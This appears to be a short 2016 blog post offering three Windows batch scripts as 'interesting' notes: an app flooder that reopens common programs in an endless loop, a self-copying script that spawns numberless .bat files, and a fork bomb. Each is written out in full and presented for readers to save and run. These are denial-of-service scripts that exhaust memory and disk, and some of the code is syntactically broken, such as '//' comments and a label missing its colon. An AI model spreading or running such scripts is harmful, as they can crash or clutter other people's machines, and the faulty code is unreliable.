Skip to main content

Posts

Showing posts from September, 2016

BATCH PROGRAMMING

H ey Friends in this blog i will share a few interesting batch programming notes just save the text  with the format of .bat A pp Flooder : @echo off x //label start winword //MS word start mspaint //paint start notepad start write //wordpad start cmd //cmd prompt start explorer start control //panel start calc //calculator goto x //infinite loop O ver   L oading   M emory   : @echo off :A SET /A x=%RANDOM%%%1999999999% type damage.bat >> %x%.bat start %x%.bat goto:A F ork B omb : :s start %0 goto s